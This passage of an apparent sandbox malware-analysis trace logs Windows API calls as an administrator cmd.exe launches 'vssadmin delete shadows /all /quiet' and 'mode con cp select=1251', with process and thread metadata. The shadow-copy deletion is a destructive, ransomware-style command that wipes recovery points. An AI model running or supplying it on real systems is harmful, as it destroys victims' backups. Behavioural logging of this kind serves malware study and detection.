0x17 [0210.114] SetErrorMode (uMode=0x0) returned 0x1 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7eab20, Size=0x52) returned 0x24bfe7eab20 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7eab20) returned 0x52 [0210.114] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0210.114] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x1bc) returned 0x24bfe7d6ca0 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x368) returned 0x24bfe7e8fb0 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7e8fb0, Size=0x1be) returned 0x24bfe7e8fb0 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7e8fb0) returned 0x1be [0210.114] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xe8) returned 0x24bfe7e9180 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7e9180, Size=0x7e) returned 0x24bfe7e9180 [0210.114] GetProcessHeap () returned 0x24bfe7d0000 [0210.114] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7e9180) returned 0x7e [0210.115] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.115] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0xffffffffffffffff [0210.115] GetLastError () returned 0x2 [0210.115] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.115] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0xffffffffffffffff [0210.115] GetLastError () returned 0x2 [0210.115] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.116] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0x24bfe7e9210 [0210.116] FindClose (in: hFindFile=0x24bfe7e9210 | out: hFindFile=0x24bfe7e9210) returned 1 [0210.116] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0xffffffffffffffff [0210.116] GetLastError () returned 0x2 [0210.116] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0x24bfe7e9210 [0210.116] FindClose (in: hFindFile=0x24bfe7e9210 | out: hFindFile=0x24bfe7e9210) returned 1 [0210.116] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0210.116] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0210.116] ??_V@YAXPEAX@Z () returned 0x1 [0210.116] GetConsoleTitleW (in: lpConsoleTitle=0x98d077f450, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0210.117] GetProcessHeap () returned 0x24bfe7d0000 [0210.117] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x21c) returned 0x24bfe7d6040 [0210.117] GetConsoleTitleW (in: lpConsoleTitle=0x24bfe7d6050, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0210.117] GetProcessHeap () returned 0x24bfe7d0000 [0210.117] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7d6040, Size=0xc2) returned 0x24bfe7d6040 [0210.117] GetProcessHeap () returned 0x24bfe7d0000 [0210.117] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7d6040) returned 0xc2 [0210.117] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0210.119] GetProcessHeap () returned 0x24bfe7d0000 [0210.119] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6040) returned 1 [0210.119] InitializeProcThreadAttributeList (in: lpAttributeList=0x98d077f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x98d077f260 | out: lpAttributeList=0x98d077f370, lpSize=0x98d077f260) returned 1 [0210.119] UpdateProcThreadAttribute (in: lpAttributeList=0x98d077f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x98d077f24c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x98d077f370, lpPreviousValue=0x0) returned 1 [0210.119] GetStartupInfoW (in: lpStartupInfo=0x98d077f300 | out: lpStartupInfo=0x98d077f300*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x33c, hStdOutput=0x348, hStdError=0x348)) [0210.119] GetProcessHeap () returned 0x24bfe7d0000 [0210.119] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x20) returned 0x24bfe7d1850 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0210.120] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0210.121] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.121] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.121] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0210.121] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0210.121] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0210.121] GetProcessHeap () returned 0x24bfe7d0000 [0210.121] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d1850) returned 1 [0210.121] GetProcessHeap () returned 0x24bfe7d0000 [0210.121] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x12) returned 0x24bfe7d6e70 [0210.121] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.121] SetConsoleMode (hConsoleHandle=0x348, dwMode=0x0) returned 0 [0210.121] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.121] SetConsoleMode (hConsoleHandle=0x33c, dwMode=0x0) returned 0 [0210.121] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x98d077f290*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x98d077f268 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x98d077f268*(hProcess=0x94, hThread=0x98, dwProcessId=0xd90, dwThreadId=0xd10)) returned 1 [0218.039] CloseHandle (hObject=0x98) returned 1 [0218.039] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.039] GetProcessHeap () returned 0x24bfe7d0000 [0218.039] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7ea020) returned 1 [0218.039] GetEnvironmentStringsW () returned 0x24bfe7e9520* [0218.039] GetProcessHeap () returned 0x24bfe7d0000 [0218.039] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xaf2) returned 0x24bfe7ea020 [0218.039] FreeEnvironmentStringsA (penv="=") returned 1 [0218.039] NtQueryInformationProcess (in: ProcessHandle=0x94, ProcessInformationClass=0x0, ProcessInformation=0x98d077e768, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x98d077e768, ReturnLength=0x0) returned 0x0 [0218.039] ReadProcessMemory (in: hProcess=0x94, lpBaseAddress=0x88bbf31000, lpBuffer=0x98d077e7a0, nSize=0x7a0, lpNumberOfBytesRead=0x98d077e760 | out: lpBuffer=0x98d077e7a0*, lpNumberOfBytesRead=0x98d077e760*=0x7a0) returned 1 [0218.039] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) Thread: id = 28 os_tid = 0xdec Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x147c7000" os_pid = "0x7ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf44" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0xd28 Thread: id = 14 os_tid = 0xd1c Thread: id = 15 os_tid = 0x7a8 Thread: id = 26 os_tid = 0xaec Thread: id = 27 os_tid = 0xdf4 Process: id = "4" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x7309000" os_pid = "0xdd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf44" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x174 Thread: id = 30 os_tid = 0xf74 Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x21e41000" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xf44" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0xd10 Thread: id = 34 os_tid = 0xb60